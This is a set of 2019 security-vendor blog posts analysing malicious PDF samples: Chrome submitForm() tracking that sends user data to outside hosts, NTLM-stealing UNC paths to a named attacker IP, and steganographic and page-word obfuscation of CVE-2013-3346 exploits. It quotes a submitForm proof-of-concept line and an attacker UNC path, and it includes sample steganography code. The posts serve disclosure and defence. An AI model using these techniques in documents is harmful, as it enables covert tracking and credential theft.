Tuesday, February 26, 2019

EdgeSpot detects PDF samples tracking users who use Google Chrome as local PDF viewer

Summary
Since late December 2018, EdgeSpot has detected multiple PDF samples in the wild which exploit an unpatched Google Chrome zero-day flaw. The exploited vulnerability allows the sender of the PDF files to track users and collect some of their information when they use Google Chrome as a local PDF viewer.


Details
Since late December 2018, our engine has flagged some interesting PDF samples. These samples appear harmless when opened in the popular Adobe Reader; however, they generate suspicious outbound traffic when opened locally in Google Chrome.

While we have detected a number of such samples, we use a typical one as an example while examining the details (the samples we detected are listed at the end of this blog post). The sample is:

Our engine detects the sample(s) as "POTENTIAL ZERO-DAY ATTACK (Google Chrome), PERSONAL INFORMATION LEAKAGE", as shown in the following image.

Note: Our description of the threat may change over time. For example, once a patch is released and the threat is assigned a CVE ID, it is no longer a "zero-day", and the description will be updated accordingly.

When the sample is opened in Google Chrome from our local disk, the content is shown below:


By capturing traffic in the background, we observed outbound traffic: data was sent to the domain "readnotify.com" without any user interaction. In other words, the data was sent out silently, without the user’s approval.

The traffic is an HTTP POST request, as shown in the following Wireshark window.



The PDF was "phoning home" in the background when the user was viewing it.

According to the HTTP packet, the following information about the user may be collected by the malicious sender:
  1. The public IP address of the user.
  2. OS, Chrome version, etc. (in the HTTP POST header).
  3. The full path of the PDF file on the user's computer (in the HTTP POST payload).
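To illustrate item 2, the OS and Chrome version can be read from the User-Agent header of such a request. The following is a minimal sketch only: the header value below is a hypothetical example, not the one from the captured traffic, and `parse_user_agent` is an illustrative helper name.

```python
import re

# Hypothetical User-Agent value for illustration; NOT taken from the captured packet.
SAMPLE_UA = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36"
)


def parse_user_agent(ua):
    """Return the platform token and Chrome version found in a User-Agent string."""
    platform = re.search(r"\(([^)]*)\)", ua)      # first parenthesised group
    chrome = re.search(r"Chrome/([\d.]+)", ua)    # Chrome/<version>
    return {
        "platform": platform.group(1) if platform else None,
        "chrome_version": chrome.group(1) if chrome else None,
    }


info = parse_user_agent(SAMPLE_UA)
print(info)
```

The public IP address (item 1) is not part of the header; the receiving server learns it from the connection itself.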
Recently, we've seen some other PDF "phoning home" zero-day issues, including the one we discovered and disclosed last November (as an ITW zero-day attack), and the very recent one discovered by @insertScript (our engine was able to detect this threat in advance). Compared with those previous finds, this new sample differs in two ways:
  1. This one affects Google Chrome (as local PDF viewer), not Adobe Reader.
  2. This one does not allow NTLM stealing, but it leaks your OS information and the path of the file stored on your local disk.
We analysed the sample(s), and found there is some suspicious Javascript code in stream-1.


After deobfuscating the code, we found that the root cause is the "this.submitForm()" PDF JavaScript API.
We tested it with a minimal PoC: a simple API call such as "this.submitForm('http://google.com/test')" makes Google Chrome send the personal information to google.com.
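For defenders, a first-pass triage step could be to look for "submitForm" calls inside a PDF. The sketch below is a naive illustration, not our engine's method: it assumes the call takes a string-literal URL and that streams are either uncompressed or Flate-compressed, so it will miss obfuscated code such as the sample above. The function name and the example.com URL are hypothetical.

```python
import re
import zlib

# Matches submitForm('<url>') or submitForm("<url>") with a string-literal argument.
SUBMIT_FORM = re.compile(rb"submitForm\s*\(\s*['\"]([^'\"]+)['\"]")
# Captures the raw bytes between the "stream" and "endstream" keywords.
STREAM = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)


def find_submit_form_targets(pdf_bytes):
    """Return the distinct URLs passed as string literals to submitForm()."""
    chunks = [pdf_bytes]  # scan the raw file as well as inflated streams
    for match in STREAM.finditer(pdf_bytes):
        try:
            # decompressobj tolerates the end-of-line bytes before "endstream"
            chunks.append(zlib.decompressobj().decompress(match.group(1)))
        except zlib.error:
            continue  # not a Flate stream (or uses a filter this sketch ignores)
    targets = []
    for chunk in chunks:
        for hit in SUBMIT_FORM.finditer(chunk):
            url = hit.group(1).decode("latin-1")
            if url not in targets:
                targets.append(url)
    return targets


# Hypothetical test input: one Flate-compressed stream holding a submitForm call.
js = b"this.submitForm('http://example.com/test');"
demo_pdf = (
    b"1 0 obj\n<< /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(js)
    + b"\nendstream\nendobj\n"
)
targets = find_submit_form_targets(demo_pdf)
print(targets)
```

A match is only a hint that the document may phone home; "submitForm" also has legitimate uses in PDF forms.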

We filed a report with Google as soon as we confirmed that it is an unpatched zero-day issue. The timeline is as follows.

2018.12.26 Finding reported to Google
2019.02.12 More samples were detected during the period
2019.02.14 After multiple communications with the Chrome team, we were informed that the fix would land in the official Chrome release in late April. The Chrome team was informed about the release of this blog post
2019.02.26 Blog post released*

*We decided to release our finding prior to the patch because we think it's better to give the affected users a chance to be informed/alerted of the potential risk, since active exploits/samples are in the wild while the patch is not close at hand.
As a temporary “workaround”, we suggest that concerned users use an alternative PDF reader application for viewing received PDF documents locally until Chrome fixes the issue, or disconnect the computer from the Internet when opening PDF documents in Chrome.

After we reported the first sample to Google, we kept finding more and more samples related to this vulnerability. In total, we’ve found two categories of such samples so far. The first category consists of samples with similar in-the-wild filenames that send data to the domain “readnotify.com”; all of them appeared on VT on 2017-10-01, which makes us believe they came from the same source. They are:

The second category is a single sample, which appeared on VT on 2018-09-26. It collects the personal information and sends it to “http://zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”.


Conclusion
This kind of "info leak" threat (privacy issue) is not easy to detect, especially when only a specific application (in this case, Google Chrome) is affected. However, our engine looks much deeper into samples with our innovative “file structure-oriented analysis” approach, so we can find the suspicious patterns and detect samples more precisely. So, when you encounter any suspicious samples or are unsure whether they are advanced attacks, try edgespot.io and see what it detects!

Follow us @EdgeSpot_io



[Update on Feb. 28]
After our original post on Tuesday, it seems that there have been some misunderstandings in media reports about this case. We want to clarify that 1) the issue/bug described here does NOT allow remote code execution, nor does it allow stealing arbitrary data from the user; 2) the issue/bug only affects users who use Chrome as a local PDF viewer (and who are concerned about their privacy). If you use Chrome for Internet browsing (not as a local PDF viewer), there's really nothing to worry about.

We used the term "zero-day" simply because we found that the abused issue/bug works on the latest Chrome; it does not mean that this is a critical remote code execution issue.



[Update on Feb. 28]
We're reporting another sample (the third category) which is related to this unpatched Chrome issue/bug. Compared to the previous two categories which may be legitimate usages, this one is more likely to be involved in malicious activities.

The sample is:

The content looks like the following:


This single PDF sample uses 3 stages to do bad things. In the above image, we highlighted the 3 blocks for these 3 stages (from top to bottom).

1. Block-1 shows an obfuscated JavaScript stream using octal encoding. After decoding (via "alert()"), the plain JavaScript code is:



As we analysed previously, the root cause of this unpatched Chrome issue (or bug) is the "this.submitForm()" API. Since the decoded JavaScript calls this API, the actor is apparently trying to track the user (if the user opens the PDF in Chrome from the local disk).
2. For block-2, the URI is: \\\\52.210.81.127@80\\mf1ob8k1b5x2ykne8ep1wswtrlmjaz\\mPbjEw8CoTTrJug3RvLyDXxwMwWr1tZz.txt The interesting point is that block-2 seems to use "@80" to make the outbound traffic go through TCP port 80. The traditional way of stealing NTLM hashes goes through SMB ports, which are usually blocked by firewalls, so this method would allow the attacker to bypass the firewall. We also saw that, unlike with the previous samples, when we connected to the server (52.210.81.127) on port 80, it responded with ‘WWW-Authenticate: Basic realm="Authentication Required"’ in the HTTP response header. To our knowledge, this is usually used to start a web-based authentication process, which more or less indicates that the actor is trying to steal something.


We should note for our readers that the theory we describe here for block-2 is not confirmed. We have tested block-2 with Adobe Reader, Chrome, and Edge, and it seems they do not support this kind of remote access via port 80. One possibility is that the actor was trying to attack some PDF reader application that we didn’t test, or that the attack only works under certain conditions. We will update this post if we find anything new.
3. Block-3 uses a traditional method of exploiting the Adobe Reader vulnerability CVE-2018-4993, trying to steal the user's NTLM credentials through SMB ports.
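The octal encoding seen in block-1 can also be undone offline, without running the script. The following is a minimal sketch, assuming each character is written as a backslash followed by up to three octal digits; the input string is a hypothetical stand-in, not the content of the sample.

```python
import re

# A backslash followed by one to three octal digits, e.g. \164 for "t".
OCTAL_ESCAPE = re.compile(r"\\([0-7]{1,3})")


def decode_octal_escapes(text):
    """Replace every \\ddd octal escape with the character it encodes."""
    return OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), text)


# Hypothetical example: encode a short script the same way, then decode it.
plain = "this.submitForm('http://example.com/x')"
obfuscated = "".join("\\%03o" % ord(ch) for ch in plain)
decoded = decode_octal_escapes(obfuscated)
print(obfuscated[:16])
print(decoded)
```

Decoding statically avoids opening the sample in a PDF reader at all, which is preferable when the document may contact a remote server.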

As of writing, the actor’s server at 52.210.81.127 is still active; both TCP ports 80 and 445 are open. You may want to block this IP address for your organization.
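When building a block list from samples like this one, the host and port can be pulled out of the block-2 path programmatically. A small sketch, assuming the path follows the "\\host@port\path" shape shown above with PDF-style doubled backslashes; `parse_unc` is an illustrative helper, not part of any library.

```python
import re

# \\host[@port]\rest-of-path, after PDF string escaping has been undone.
UNC = re.compile(r"^\\\\(?P<host>[^\\@]+)(?:@(?P<port>\d+))?\\(?P<path>.*)$")


def parse_unc(escaped_path):
    """Split an escaped UNC-style path into host, optional port and path."""
    normalized = escaped_path.replace("\\\\", "\\")  # collapse doubled backslashes
    match = UNC.match(normalized)
    if match is None:
        return None
    port = match.group("port")
    return {
        "host": match.group("host"),
        "port": int(port) if port is not None else None,
        "path": match.group("path"),
    }


# The URI from block-2, written exactly as it appears in the PDF.
block2_uri = r"\\\\52.210.81.127@80\\mf1ob8k1b5x2ykne8ep1wswtrlmjaz\\mPbjEw8CoTTrJug3RvLyDXxwMwWr1tZz.txt"
parsed = parse_unc(block2_uri)
print(parsed["host"], parsed["port"])
```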

As a wrap-up for this analysis, this interesting PDF sample uses three methods for tracking users and/or stealing users’ NTLM credentials. It uses the unpatched Chrome issue/bug to track the user if the PDF is opened in Chrome (block-1), and it uses the vulnerability CVE-2018-4993 in an attempt to steal the user’s NTLM hash if the PDF is opened in an affected Adobe Reader (block-3). Block-2 leaves us with an interesting mystery.



Tuesday, January 22, 2019

"steganography" - obfuscating PDF exploits in depth

Shortly after last week's discovery of a PDF exploit which used this.getPageNumWords() & this.getPageNthWord() for obfuscation, we found another, much more powerful obfuscation technique in PDF exploits. This technique uses a so-called "steganography" method to hide malicious JavaScript code in images embedded in PDF files. It is powerful because it can bypass almost all AV engines.

The sample was detected as "exploit CVE-2013-3346" by our EdgeLogic engine, same as the previous one.



The sample was first submitted to VirusTotal on 2017-10-10, with a filename "oral-b oxyjet spec.pdf".



Only one AV engine detected this exploit last week (as of writing, however, detection has increased to 5/57).



Once opened, the PDF, disguised as an IRS document, looks normal.




Two layers of obfuscation were used in this sample. The first layer is what we have previously disclosed - the method of "this.getPageNumWords()" and "this.getPageNthWord()". The exploit uses "this.getPageNumWords()" and "this.getPageNthWord()" to read and execute the Javascript hidden as "content". The related code can be found in PDF stream-64.

stream-64

The second layer is new, and it's our focus in this blog. The "JavaScript content" is stored in stream-119. Let's see what it looks like.



After beautifying the JavaScript, it looks as follows:




In order to figure out what the JavaScript does, we first need to understand two PDF JS APIs: this.getIcon() and util.iconStreamFromIcon(). The following is an extract from Adobe's reference.






According to the API references, these two APIs work together to read the stream of an image named "icon" stored in the PDF file.

By examining the above JavaScript code, we figured out that the code’s function is to read and decode the "message" hidden in the icon’s stream. Once it has read the "message" successfully, it executes the "message" as JavaScript code via "eval(msg)".
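To make the general idea concrete, here is a minimal sketch of one common steganography scheme: storing a message in the least significant bit of each byte of the carrier data. This is a generic illustration and an assumption on our part; it is not the encoding used by this sample or by any specific library, and the cover bytes and script below are hypothetical.

```python
def hide(cover, message):
    """Hide message bytes in the least significant bit of each cover byte."""
    payload = len(message).to_bytes(2, "big") + message  # 2-byte length prefix
    bits = [(byte >> shift) & 1 for byte in payload for shift in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover data is too small for this message")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit  # overwrite only the lowest bit
    return bytes(stego)


def reveal(stego):
    """Recover the message hidden by hide()."""
    def read_bytes(start_bit, count):
        out = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (stego[start_bit + b * 8 + i] & 1)
            out.append(value)
        return bytes(out)

    length = int.from_bytes(read_bytes(0, 2), "big")
    return read_bytes(16, length)


cover = bytes(range(256)) * 2          # stand-in for raw image sample data
script = b"app.alert('hidden');"       # hypothetical, harmless payload
stego = hide(cover, script)
recovered = reveal(stego)
print(recovered)
```

Each carrier byte changes by at most 1, which is why an image carrying such a message can still display normally while a scanner looking at the raw stream sees nothing that resembles script code.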

The icon stream named "icon" in object-131 can be saved as a "jpg" file and viewed in an image viewer without any problem, as shown below:

The malicious data is hidden in the image while the image is still viewable

Nevertheless, no suspicious data can be found inside the icon file, since the malicious code is heavily obfuscated.

What does the final executed JavaScript look like? Here is a piece of the real code, after successful deobfuscation.



Therefore, we confirmed the exploited vulnerability is CVE-2013-3346.

Furthermore, we deduce that this sample and the previous one came from the same author, for the following reasons:
  1. Both of them exploit the same vulnerability (CVE-2013-3346)
  2. The similarity of the Javascript code in these two exploits.
After some googling, we found that the attacker likely copied a project/technique called "steganography.js", which is open source. The project was developed to work in browsers. We believe the person behind the PDF samples innovated by successfully applying the technique to the PDF format. We could not find any information mentioning this technique in PDF exploits before, so we believe this is the first time that the "steganography" technique has been used to hide PDF exploits.


Conclusion
We were impressed by this technique, which is perfect for malicious code obfuscation for PDF exploits. By using this technique, all streams look normal, all images are viewable, everything looks legitimate. This can probably explain why almost all AV engines missed it.

In this blog we looked into the truly advanced "steganography" technique used for obfuscating PDF exploits. It also demonstrates the power of our EdgeLogic engine, as we are able to beat this obfuscation technique, among many others.

Just like the previous one, the "steganography" technique can be used to obfuscate not only this exploit (CVE-2013-3346) but also many other PDF exploits, including zero-days. We ask security defenders to pay close attention to it.


Monday, January 14, 2019

An interesting obfuscation method for PDF exploits (this.getPageNumWords() & this.getPageNthWord())

Recently, our EdgeLogic engine detected a malicious PDF sample, reported as "exploit CVE-2013-3346".





The sample first appeared on VirusTotal on 2017-10-06.






Although this sample has been on VT for more than a year, most AV engines are unable to detect it.




Therefore it was brought to our attention when it was successfully detected by our engine. We analysed the sample manually. The stream of object-1 contains interesting JavaScript.




It uses the PDF JS APIs this.getPageNumWords() and this.getPageNthWord() to "read" the JavaScript contents from the PDF pages, and then executes that JavaScript via eval(box).
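The effect of that loader can be modelled outside a PDF reader. The sketch below is a simplified simulation, assuming the words are joined with single spaces; the page contents and the `rebuild_script` helper are hypothetical, and the real sample's loop may differ.

```python
def rebuild_script(pages, separator=" "):
    """Join every word on every page, in reading order, into one string.

    Each inner list stands in for the words that getPageNthWord() would
    return for one page; len(page) plays the role of getPageNumWords().
    """
    words = []
    for page in pages:
        for word_index in range(len(page)):
            words.append(page[word_index])
    return separator.join(words)


# Hypothetical document: page 1 is the visible decoy, later pages hold the script.
pages = [
    ["Quarterly", "report"],
    ["var", "x", "=", "1;"],
    ["app.alert(x);"],
]
script = rebuild_script(pages[1:])  # skip the decoy page
print(script)
```

Because the script exists only as ordinary page text until it is reassembled, a scanner that inspects only JavaScript streams never sees it in one piece.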

We can see that object-6, object-8, and object-10 contain JavaScript, but it is stored as page "content" to be read by the code in object-1.



content of object-6

content of object-8

content of object-10


After some googling, we believe this is an exploit for the PDF vulnerability CVE-2013-3346, about which FireEye published a blog in December 2013. The exploit was not obfuscated at that time. Because of the obfuscation method, it remains largely undetected by AV engines.

The obfuscation method does not seem to be new either; it was mentioned in a 2010 blog from F-Secure. However, as we have seen, the method is still quite effective.

When displayed on a non-vulnerable PDF reader, the PDF displays like this.


The above is the 1st page. The PDF contains 4 pages in total; the remaining three pages hold object-6, object-8, and object-10, respectively. The exploit maker rendered the words on these three pages at a very small size, but after zooming to 500% we could confirm that these are the JS strings we found in object-6, object-8, and object-10.




Conclusion
The obfuscation method described in this blog may not be new, but it is very effective at bypassing many detection engines. More importantly, we should realize that this obfuscation method could be used to obfuscate not only this exploit (CVE-2013-3346) but many other PDF exploits, including zero-days. This is another good example demonstrating the power of our EdgeLogic engine: we were able to beat the obfuscation method used in this PDF exploit. So, when you encounter suspicious samples, whether they are email formats (eml, msg), Office files (doc, xls, ppt), PDF, or even .zip, try edgespot.io and see what it detects!